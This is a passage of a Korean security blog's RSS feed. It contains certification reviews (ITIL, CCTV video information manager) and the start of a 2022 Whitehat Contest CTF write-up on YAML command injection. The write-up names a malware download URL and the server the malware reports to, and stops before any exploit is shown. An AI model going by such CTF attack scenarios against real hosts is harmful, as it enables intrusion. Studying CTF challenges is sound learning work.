&lt;p data-ke-size=&quot;size16&quot;&gt;매년 5만큼의 CPD를 입력해야 자격이 유지된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1250&quot; data-origin-height=&quot;730&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bme7ws/dJMb9Mv9CWe/5s7mKVBJwI5vTg1kbHPsu0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bme7ws/dJMb9Mv9CWe/5s7mKVBJwI5vTg1kbHPsu0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bme7ws/dJMb9Mv9CWe/5s7mKVBJwI5vTg1kbHPsu0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbme7ws%2FdJMb9Mv9CWe%2F5s7mKVBJwI5vTg1kbHPsu0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1250&quot; height=&quot;730&quot; data-origin-width=&quot;1250&quot; data-origin-height=&quot;730&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;근데 웃긴게&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;CPD를 입력하려면 맴버십 가입을 필수적으로 해야한다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;비용은 매년 129달러... 약 20만원가까이 매년 지출이 발생한다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;결국 갱신하려면 60만원이 필요하다는 뜻&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;자격증에 돈 아끼지 말자는 주의지만&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이건 좀 고민되긴 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;가성비 좋게 가려면 상위 자격증을 더 따는게 나을까 싶긴한데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이건 좀더 고민이 필요할것 같다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;어쨌든 이번 공부를 통해&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;운영 관점에서 서비스 품질을 어떻게 정의하고 통제해야 하는가에 대한 내용을&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;배울 수 있는 계기가 되었다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>자격증/IT&amp;middot;전산&amp;middot;보안</category>
      <category>ITIL</category>
      <category>ITILv4</category>
      <category>ITILV4Foundation</category>
      <category>ITIL후기</category>
      <category>자격증</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>취업</category>
      <category>취준</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/724</guid>
      <comments>https://hackingstudypad.tistory.com/724#entry724comment</comments>
      <pubDate>Tue, 28 Oct 2025 10:55:50 +0900</pubDate>
    </item>
    <item>
      <title>[영상정보관리사] 시험정보 / 후기 / 공부방법</title>
      <link>https://hackingstudypad.tistory.com/723</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;23. 영상정보관리사.jpg&quot; data-origin-width=&quot;2490&quot; data-origin-height=&quot;1626&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/BkhJ6/dJMb9OAJspC/SGC9y73YL3muTCqjMZu1o0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/BkhJ6/dJMb9OAJspC/SGC9y73YL3muTCqjMZu1o0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/BkhJ6/dJMb9OAJspC/SGC9y73YL3muTCqjMZu1o0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FBkhJ6%2FdJMb9OAJspC%2FSGC9y73YL3muTCqjMZu1o0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;514&quot; height=&quot;336&quot; data-filename=&quot;23. 영상정보관리사.jpg&quot; data-origin-width=&quot;2490&quot; data-origin-height=&quot;1626&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;제목 없음.png&quot; data-origin-width=&quot;873&quot; data-origin-height=&quot;189&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/PeZLY/dJMb9Pl63ku/Ht3vqw7V4keLFHYuIeDkiK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/PeZLY/dJMb9Pl63ku/Ht3vqw7V4keLFHYuIeDkiK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/PeZLY/dJMb9Pl63ku/Ht3vqw7V4keLFHYuIeDkiK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FPeZLY%2FdJMb9Pl63ku%2FHt3vqw7V4keLFHYuIeDkiK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;873&quot; height=&quot;189&quot; data-filename=&quot;제목 없음.png&quot; data-origin-width=&quot;873&quot; data-origin-height=&quot;189&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;2025년 7월 합격한 영상정보관리사 자격증&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;한국정보통신자격협회에서 발급하는&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;국가공인 민간자격이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: justify;&quot;&gt; 상정보처리기기(CCTV, 드론영상 등)에서 수집되는 영상정보를 관리 및 보호하고, &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: justify;&quot;&gt;지능형 영상정보관제시스템을 모니터링‧운용할 수 있는 관제능력을 평가하는 자격증으로,&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;2024년 11월 28일부로 국가공인 자격으로 지정되었다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;내가 알기론 개인정보보호위원회에서 처음으로 공인한 자격증인데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;대체 왜 아직까지 개인정보 관련 국가공인 자격증이 없는지는 모르겠다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;응시 자격엔 별도 제한이 없고&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;검정료는 7만 5천원으로 상당히 비싼 편이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;검정과목은 크게 아래와 같이 세가지로 나눈다&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;영상정보 관리일반&lt;/li&gt;
&lt;li&gt;영상정보 관제시스템&lt;/li&gt;
&lt;li&gt;영상정보 관리 실무&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;필기/실기가 구분되어 있으나, 동일한 시험일에 필기/실기를 모두 응시하는 구조이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;필기는 총 40문항이고 40분 제한시간,&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실기는 총 13문항이며 역시 40분의 제한시간을 가진다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;시험칠때는 실기문제를 먼저 풀고나서 필기 시험이 진행된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;필기 실기를 모두 40정 이상 득점하고, 두 과목 평균이 60점 이상이어야 합격이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;384&quot; data-origin-height=&quot;517&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zDHAJ/dJMb9MiCJl7/okAa21t8v5ObT40i9a0e01/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zDHAJ/dJMb9MiCJl7/okAa21t8v5ObT40i9a0e01/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zDHAJ/dJMb9MiCJl7/okAa21t8v5ObT40i9a0e01/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzDHAJ%2FdJMb9MiCJl7%2FokAa21t8v5ObT40i9a0e01%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;384&quot; height=&quot;517&quot; data-origin-width=&quot;384&quot; data-origin-height=&quot;517&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;시험공부는 성안당에서 출판한&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;CCTV 영상관제 전문가를 위한 영상정보관리사 책을 이용했다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;결론부터 말하면 이 책은 &lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;비추&lt;/span&gt;&lt;/b&gt;다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;저지의 전문성이 의심되는 수준이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그냥 대충 시험범위 같이 보이는건 두서없이 다 때려넣어놔서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;불필요한 내용과 중복되는 내용이 너무 많다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그것들만 없애도 책 두께가 3분의 1은 될듯&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;표지에 써있는 '과목별 핵심 정리' 라는 말을 보고 양심이 없다고 생각했다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;원래 자격증 공부할때 이론을 3~4회독 하고 기출문제를 풀어보는 편인데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이론 몇장 넘겨보고 답도 없겠다 싶어서 그냥 바로 기출만 돌렸다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure id=&quot;og_1761476674034&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;자료실 1 페이지 | (사)한국정보통신자격협회&quot; data-og-description=&quot;&quot; data-og-host=&quot;www.icqa.or.kr&quot; data-og-source-url=&quot;https://www.icqa.or.kr/cn/board/dataroom?sca=%EC%98%81%EC%83%81%EC%A0%95%EB%B3%B4%EA%B4%80%EB%A6%AC%EC%82%AC&quot; data-og-url=&quot;https://www.icqa.or.kr/cn/board/dataroom?sca=%EC%98%81%EC%83%81%EC%A0%95%EB%B3%B4%EA%B4%80%EB%A6%AC%EC%82%AC&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://www.icqa.or.kr/cn/board/dataroom?sca=%EC%98%81%EC%83%81%EC%A0%95%EB%B3%B4%EA%B4%80%EB%A6%AC%EC%82%AC&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.icqa.or.kr/cn/board/dataroom?sca=%EC%98%81%EC%83%81%EC%A0%95%EB%B3%B4%EA%B4%80%EB%A6%AC%EC%82%AC&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;자료실 1 페이지 | (사)한국정보통신자격협회&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.icqa.or.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;IQCA 홈페이지에서 영상정보관리사 관련 기출문제와 자료, 예제 프로그램을 제공하니&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;시험전에 한번 해보고 가면 좋다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;필기는 사실 어느 시험이 그렇듯 기출만 풀어서 외우고 가면 무난하고&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실기도 눈과 손만 있다면 풀수 있는 수준이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;CCTV 영상 분석해서 답을 찾는 문제나&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;컴퓨터 IP, 이름 설정하는 문제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;CCTV 관제 프로그램 관련 문제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;개인정보보호법 문제&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;대충 이런 흐름으로 나오는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;개보법만 조금 공부하면 모두가 무난하게 풀수있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;정 걱정되면 예재 프로그램 한번 해보면 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;어려운 시험은 아니니&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1~2주 정도 가볍게 준비하면 충분히 합격할 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>자격증/IT&amp;middot;전산&amp;middot;보안</category>
      <category>CCTV</category>
      <category>개인정보</category>
      <category>개인정보보호법</category>
      <category>영상정보관리사</category>
      <category>자격증</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>취업</category>
      <category>취준</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/723</guid>
      <comments>https://hackingstudypad.tistory.com/723#entry723comment</comments>
      <pubDate>Sun, 26 Oct 2025 20:09:22 +0900</pubDate>
    </item>
    <item>
      <title>[2022 화이트햇 콘테스트 본선] F-1- 웹해킹 / Python / YAML Command Injection</title>
      <link>https://hackingstudypad.tistory.com/722</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;f-1.PNG&quot; data-origin-width=&quot;488&quot; data-origin-height=&quot;583&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/399W9/btsGuPqJlkP/1mK2SK8Mb3xEur1PdKRUl0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/399W9/btsGuPqJlkP/1mK2SK8Mb3xEur1PdKRUl0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/399W9/btsGuPqJlkP/1mK2SK8Mb3xEur1PdKRUl0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F399W9%2FbtsGuPqJlkP%2F1mK2SK8Mb3xEur1PdKRUl0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;488&quot; height=&quot;583&quot; data-filename=&quot;f-1.PNG&quot; data-origin-width=&quot;488&quot; data-origin-height=&quot;583&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;2022 화이트햇 콘테스트 본선에 출제되었던 문제&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;이전 E-5 문제와 이어지는 문제이다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;(&lt;a href=&quot;https://hackingstudypad.tistory.com/718&quot;&gt;https://hackingstudypad.tistory.com/720&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;)&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;F-1 문제에서는&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;D-2의 악성코드와 통신하는 서버에 취약점을 찾아 공격하고&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;플래그를 획득하는 것이 목표이다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;908&quot; data-origin-height=&quot;269&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ej36mn/btsGwBSv3dh/NLQskGkuEH89whIE2G4kaK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ej36mn/btsGwBSv3dh/NLQskGkuEH89whIE2G4kaK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ej36mn/btsGwBSv3dh/NLQskGkuEH89whIE2G4kaK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fej36mn%2FbtsGwBSv3dh%2FNLQskGkuEH89whIE2G4kaK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;908&quot; height=&quot;269&quot; data-origin-width=&quot;908&quot; data-origin-height=&quot;269&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;D-2 문제의 악성코드는&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;http://15.165.18.103/gmae 에서 다운받은&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;dd.exe 인데&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;무력화환 도구들을 실행시켰을 때&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;dd.exe 가 대신 실행되도록 하는것이었다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;dd.exe 가 실행되면&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;3.39.253.212 목적지로 어떤 값을 보내는데&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;그 값이 형태가 YAML 형식이었다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;588&quot; data-origin-height=&quot;213&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cQyDBt/btsGuOyADB1/IdEyAj1mqpAulKPKiBiTEK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cQyDBt/btsGuOyADB1/IdEyAj1mqpAulKPKiBiTEK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cQyDBt/btsGuOyADB1/IdEyAj1mqpAulKPKiBiTEK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcQyDBt%2FbtsGuOyADB1%2FIdEyAj1mqpAulKPKiBiTEK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;588&quot; height=&quot;213&quot; data-origin-width=&quot;588&quot; data-origin-height=&quot;213&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
